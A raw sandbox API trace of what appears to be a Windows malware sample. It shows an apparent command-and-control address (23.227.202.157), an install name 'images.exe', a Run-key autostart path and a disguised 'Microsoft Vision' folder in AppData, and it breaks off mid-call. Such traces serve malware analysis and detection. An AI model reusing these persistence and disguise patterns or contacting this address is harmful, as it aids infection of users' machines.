[0132.208] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f1038 | out: hHeap=0x7c0000) returned 1 [0132.208] GetProcessHeap () returned 0x7c0000 [0132.209] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7ec028 | out: hHeap=0x7c0000) returned 1 [0132.209] GetProcessHeap () returned 0x7c0000 [0132.210] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x80f318 | out: hHeap=0x7c0000) returned 1 [0132.214] GetProcessHeap () returned 0x7c0000 [0132.214] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x82ab38 [0132.214] GetProcessHeap () returned 0x7c0000 [0132.214] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f0a30 | out: hHeap=0x7c0000) returned 1 [0132.215] lstrlenA (lpString=".bss") returned 4 [0132.215] lstrlenA (lpString=".bss") returned 4 [0132.215] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0132.215] lstrcpyA (in: lpString1=0x3610000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0132.215] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75640000 [0132.216] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0132.216] GetProcessHeap () returned 0x7c0000 [0132.217] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x13000) returned 0x80f318 [0132.218] lstrlenA (lpString=".text") returned 5 [0132.218] lstrlenA (lpString=".text") returned 5 [0132.218] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.218] lstrcpyA (in: lpString1=0x3620000, lpString2=".text" | out: lpString1=".text") returned=".text" [0132.218] lstrcmpA (lpString1=".text", lpString2=".bss") returned 1 [0132.218] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.219] GetProcessHeap () returned 0x7c0000 [0132.220] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x80f318 | out: hHeap=0x7c0000) returned 1 [0132.220] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75640000 [0132.221] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0132.221] GetProcessHeap () returned 0x7c0000 [0132.221] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a00) returned 0x7e7620 [0132.221] lstrlenA (lpString=".rdata") returned 6 [0132.221] lstrlenA (lpString=".rdata") returned 6 [0132.221] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.224] lstrcpyA (in: lpString1=0x3620000, lpString2=".rdata" | out: lpString1=".rdata") returned=".rdata" [0132.224] lstrcmpA (lpString1=".rdata", lpString2=".bss") returned 1 [0132.224] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.225] GetProcessHeap () returned 0x7c0000 [0132.226] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.226] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75640000 [0132.226] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0132.226] GetProcessHeap () returned 0x7c0000 [0132.227] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x600) returned 0x7e7620 [0132.227] lstrlenA (lpString=".data") returned 5 [0132.227] lstrlenA (lpString=".data") returned 5 [0132.227] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.227] lstrcpyA (in: lpString1=0x3620000, lpString2=".data" | out: lpString1=".data") returned=".data" [0132.227] lstrcmpA (lpString1=".data", lpString2=".bss") returned 1 [0132.227] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.228] GetProcessHeap () returned 0x7c0000 [0132.229] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.229] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75640000 [0132.229] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0132.229] GetProcessHeap () returned 0x7c0000 [0132.229] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x2e00) returned 0x7e7620 [0132.229] lstrlenA (lpString=".rsrc") returned 5 [0132.229] lstrlenA (lpString=".rsrc") returned 5 [0132.230] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.230] lstrcpyA (in: lpString1=0x3620000, lpString2=".rsrc" | out: lpString1=".rsrc") returned=".rsrc" [0132.230] lstrcmpA (lpString1=".rsrc", lpString2=".bss") returned 1 [0132.230] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.231] GetProcessHeap () returned 0x7c0000 [0132.231] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.231] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75640000 [0132.232] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0132.232] GetProcessHeap () returned 0x7c0000 [0132.232] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1000) returned 0x7e7620 [0132.232] lstrlenA (lpString=".reloc") returned 6 [0132.232] lstrlenA (lpString=".reloc") returned 6 [0132.232] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.232] lstrcpyA (in: lpString1=0x3620000, lpString2=".reloc" | out: lpString1=".reloc") returned=".reloc" [0132.233] lstrcmpA (lpString1=".reloc", lpString2=".bss") returned 1 [0132.233] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.233] GetProcessHeap () returned 0x7c0000 [0132.234] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.234] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75640000 [0132.234] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0132.234] GetProcessHeap () returned 0x7c0000 [0132.234] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x82ad40 [0132.242] lstrlenA (lpString=".bss") returned 4 [0132.242] lstrlenA (lpString=".bss") returned 4 [0132.242] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.242] lstrcpyA (in: lpString1=0x3620000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0132.243] lstrcmpA (lpString1=".bss", lpString2=".bss") returned 0 [0132.243] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.243] GetProcessHeap () returned 0x7c0000 [0132.244] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x82ad40 | out: hHeap=0x7c0000) returned 1 [0132.247] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x75640000 [0132.247] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0132.247] GetProcessHeap () returned 0x7c0000 [0132.248] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x82ad40 [0132.248] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.249] GetProcessHeap () returned 0x7c0000 [0132.249] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x7e7620 [0132.249] GetProcessHeap () returned 0x7c0000 [0132.249] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x7e7828 [0132.249] GetProcessHeap () returned 0x7c0000 [0132.250] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.251] GetProcessHeap () returned 0x7c0000 [0132.251] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x7e7620 [0132.251] GetProcessHeap () returned 0x7c0000 [0132.251] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x7e7a30 [0132.251] GetProcessHeap () returned 0x7c0000 [0132.251] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.252] GetProcessHeap () returned 0x7c0000 [0132.252] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x7e7620 [0132.252] GetProcessHeap () returned 0x7c0000 [0132.252] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d58a8 [0132.252] GetProcessHeap () returned 0x7c0000 [0132.252] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d53e8 [0132.252] GetProcessHeap () returned 0x7c0000 [0132.253] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d58a8 | out: hHeap=0x7c0000) returned 1 [0132.253] GetProcessHeap () returned 0x7c0000 [0132.253] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d5668 [0132.253] GetProcessHeap () returned 0x7c0000 [0132.254] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d53e8 | out: hHeap=0x7c0000) returned 1 [0132.254] GetProcessHeap () returned 0x7c0000 [0132.254] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d56a8 [0132.255] GetProcessHeap () returned 0x7c0000 [0132.255] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x7e7c08 [0132.258] GetProcessHeap () returned 0x7c0000 [0132.258] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1ca) returned 0x7e7de0 [0132.258] GetProcessHeap () returned 0x7c0000 [0132.258] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7c08 | out: hHeap=0x7c0000) returned 1 [0132.258] GetProcessHeap () returned 0x7c0000 [0132.258] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d56a8 | out: hHeap=0x7c0000) returned 1 [0132.258] GetProcessHeap () returned 0x7c0000 [0132.258] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0132.258] GetProcessHeap () returned 0x7c0000 [0132.259] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7a30 | out: hHeap=0x7c0000) returned 1 [0132.259] GetProcessHeap () returned 0x7c0000 [0132.259] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x1e) returned 0x7e1390 [0132.259] lstrlenW (lpString="23.227.202.157") returned 14 [0132.259] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0132.259] lstrlenW (lpString="23.227.202.157") returned 14 [0132.259] lstrcpyW (in: lpString1=0x3610000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0132.259] lstrlenW (lpString="23.227.202.157") returned 14 [0132.259] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.260] lstrcpyW (in: lpString1=0x3620000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0132.260] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.260] GetProcessHeap () returned 0x7c0000 [0132.260] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e1390 | out: hHeap=0x7c0000) returned 1 [0132.260] lstrlenW (lpString="23.227.202.157") returned 14 [0132.260] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0132.261] lstrcpyW (in: lpString1=0x3610000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0132.261] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.262] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0132.262] GetProcessHeap () returned 0x7c0000 [0132.262] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x16) returned 0x7db8c8 [0132.262] lstrlenW (lpString="images.exe") returned 10 [0132.262] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.262] lstrlenW (lpString="images.exe") returned 10 [0132.262] lstrcpyW (in: lpString1=0x3620000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0132.262] lstrlenW (lpString="images.exe") returned 10 [0132.262] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0132.263] lstrcpyW (in: lpString1=0x3630000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0132.263] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.263] GetProcessHeap () returned 0x7c0000 [0132.263] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7db8c8 | out: hHeap=0x7c0000) returned 1 [0132.263] lstrlenW (lpString="images.exe") returned 10 [0132.263] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0132.264] lstrcpyW (in: lpString1=0x3620000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0132.264] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.264] GetProcessHeap () returned 0x7c0000 [0132.264] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0xe) returned 0x7e3610 [0132.264] lstrlenW (lpString="Images") returned 6 [0132.265] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0132.265] lstrlenW (lpString="Images") returned 6 [0132.265] lstrcpyW (in: lpString1=0x3630000, lpString2="Images" | out: lpString1="Images") returned="Images" [0132.265] lstrlenW (lpString="Images") returned 6 [0132.265] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0132.265] lstrcpyW (in: lpString1=0x3640000, lpString2="Images" | out: lpString1="Images") returned="Images" [0132.265] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.266] GetProcessHeap () returned 0x7c0000 [0132.266] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e3610 | out: hHeap=0x7c0000) returned 1 [0132.266] lstrlenW (lpString="Images") returned 6 [0132.266] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0132.266] lstrcpyW (in: lpString1=0x3630000, lpString2="Images" | out: lpString1="Images") returned="Images" [0132.266] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.267] GetProcessHeap () returned 0x7c0000 [0132.267] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x16) returned 0x7db968 [0132.267] lstrlenW (lpString="L15UQINRPS") returned 10 [0132.267] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0132.267] lstrlenW (lpString="L15UQINRPS") returned 10 [0132.267] lstrcpyW (in: lpString1=0x3640000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0132.267] lstrlenW (lpString="L15UQINRPS") returned 10 [0132.267] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3650000 [0132.267] lstrcpyW (in: lpString1=0x3650000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0132.267] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.268] GetProcessHeap () returned 0x7c0000 [0132.268] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7db968 | out: hHeap=0x7c0000) returned 1 [0132.268] lstrlenW (lpString="L15UQINRPS") returned 10 [0132.268] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0132.269] lstrcpyW (in: lpString1=0x3640000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0132.269] VirtualFree (lpAddress=0x3650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.269] GetProcessHeap () returned 0x7c0000 [0132.270] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7de0 | out: hHeap=0x7c0000) returned 1 [0132.270] GetProcessHeap () returned 0x7c0000 [0132.270] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x82ad40 | out: hHeap=0x7c0000) returned 1 [0132.270] GetProcessHeap () returned 0x7c0000 [0132.271] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x82ab38 | out: hHeap=0x7c0000) returned 1 [0132.271] GetProcessHeap () returned 0x7c0000 [0132.271] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x829b30 | out: hHeap=0x7c0000) returned 1 [0132.272] GetProcessHeap () returned 0x7c0000 [0132.272] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x826d28 | out: hHeap=0x7c0000) returned 1 [0132.273] GetProcessHeap () returned 0x7c0000 [0132.273] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f2bf8 | out: hHeap=0x7c0000) returned 1 [0132.273] GetProcessHeap () returned 0x7c0000 [0132.274] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x822320 | out: hHeap=0x7c0000) returned 1 [0132.279] GetProcessHeap () returned 0x7c0000 [0132.281] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7fc310 | out: hHeap=0x7c0000) returned 1 [0132.281] GetProcessHeap () returned 0x7c0000 [0132.282] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7fbf08 | out: hHeap=0x7c0000) returned 1 [0132.282] ReleaseMutex (hMutex=0x2b4) returned 0 [0132.282] CloseHandle (hObject=0x2b4) returned 1 [0132.282] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0132.282] GetProcessHeap () returned 0x7c0000 [0132.282] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d58a8 [0132.282] lstrlenW (lpString="23.227.202.157") returned 14 [0132.282] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3650000 [0132.282] lstrcpyW (in: lpString1=0x3650000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0132.283] lstrlenW (lpString="images.exe") returned 10 [0132.283] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3660000 [0132.283] lstrcpyW (in: lpString1=0x3660000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0132.283] lstrlenW (lpString="Images") returned 6 [0132.283] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3670000 [0132.283] lstrcpyW (in: lpString1=0x3670000, lpString2="Images" | out: lpString1="Images") returned="Images" [0132.284] lstrlenW (lpString="L15UQINRPS") returned 10 [0132.284] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3680000 [0132.284] lstrcpyW (in: lpString1=0x3680000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0132.284] GetProcessHeap () returned 0x7c0000 [0132.284] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x7e7620 [0132.284] GetCurrentProcess () returned 0xffffffff [0132.284] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2daf894 | out: TokenHandle=0x2daf894*=0x2b4) returned 1 [0132.284] GetTokenInformation (in: TokenHandle=0x2b4, TokenInformationClass=0x14, TokenInformation=0x2daf88c, TokenInformationLength=0x4, ReturnLength=0x2daf890 | out: TokenInformation=0x2daf88c, ReturnLength=0x2daf890) returned 1 [0132.284] CloseHandle (hObject=0x2b4) returned 1 [0132.284] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0132.284] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0132.285] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0132.285] lstrcpyW (in: lpString1=0x3690000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0132.285] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0132.285] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x36a0000 [0132.285] lstrcpyW (in: lpString1=0x36a0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0132.285] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.286] lstrlenW (lpString="L15UQINRPS") returned 10 [0132.286] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0132.286] lstrcpyW (in: lpString1=0x3690000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0132.286] lstrlenW (lpString="L15UQINRPS") returned 10 [0132.286] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0132.286] VirtualQuery (in: lpAddress=0x36a0000, lpBuffer=0x2daf84c, dwLength=0x1c | out: lpBuffer=0x2daf84c*(BaseAddress=0x36a0000, AllocationBase=0x36a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.286] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x36b0000 [0132.287] VirtualFree (lpAddress=0x36a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.288] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", lpString2="L15UQINRPS" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS" [0132.288] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.293] lstrlenW (lpString="inst") returned 4 [0132.293] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0132.294] lstrlenW (lpString="inst") returned 4 [0132.294] lstrcpyW (in: lpString1=0x3690000, lpString2="inst" | out: lpString1="inst") returned="inst" [0132.294] lstrlenW (lpString="inst") returned 4 [0132.294] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x36a0000 [0132.294] lstrcpyW (in: lpString1=0x36a0000, lpString2="inst" | out: lpString1="inst") returned="inst" [0132.294] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.295] lstrlenW (lpString="InitWindows") returned 11 [0132.295] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0132.296] lstrlenW (lpString="InitWindows") returned 11 [0132.296] lstrcpyW (in: lpString1=0x3690000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0132.296] lstrlenW (lpString="InitWindows") returned 11 [0132.296] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x36c0000 [0132.296] lstrcpyW (in: lpString1=0x36c0000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0132.296] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.297] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0132.298] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0132.298] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0132.298] lstrcpyW (in: lpString1=0x3690000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0132.298] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0132.298] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x36d0000 [0132.298] lstrcpyW (in: lpString1=0x36d0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0132.298] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.301] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\L15UQINRPS", ulOptions=0x0, samDesired=0xf003f, phkResult=0x2daf950 | out: phkResult=0x2daf950*=0x0) returned 0x2 [0132.302] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0132.303] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x2b4 [0132.303] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2dafd1c | out: lpWSAData=0x2dafd1c) returned 0 [0132.303] GetProcessHeap () returned 0x7c0000 [0132.303] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x32) returned 0x7d53e8 [0132.303] lstrlenW (lpString="23.227.202.157") returned 14 [0132.303] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x36e0000 [0132.303] lstrcpyW (in: lpString1=0x36e0000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0132.303] lstrlenW (lpString="images.exe") returned 10 [0132.303] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x36f0000 [0132.303] lstrcpyW (in: lpString1=0x36f0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0132.304] lstrlenW (lpString="Images") returned 6 [0132.304] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3700000 [0132.304] lstrcpyW (in: lpString1=0x3700000, lpString2="Images" | out: lpString1="Images") returned="Images" [0132.304] lstrlenW (lpString="L15UQINRPS") returned 10 [0132.304] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3710000 [0132.304] lstrcpyW (in: lpString1=0x3710000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0132.304] GetProcessHeap () returned 0x7c0000 [0132.304] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x200) returned 0x7f2bf8 [0132.304] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3720000 [0132.305] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2dafad8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0132.308] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" [0132.308] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 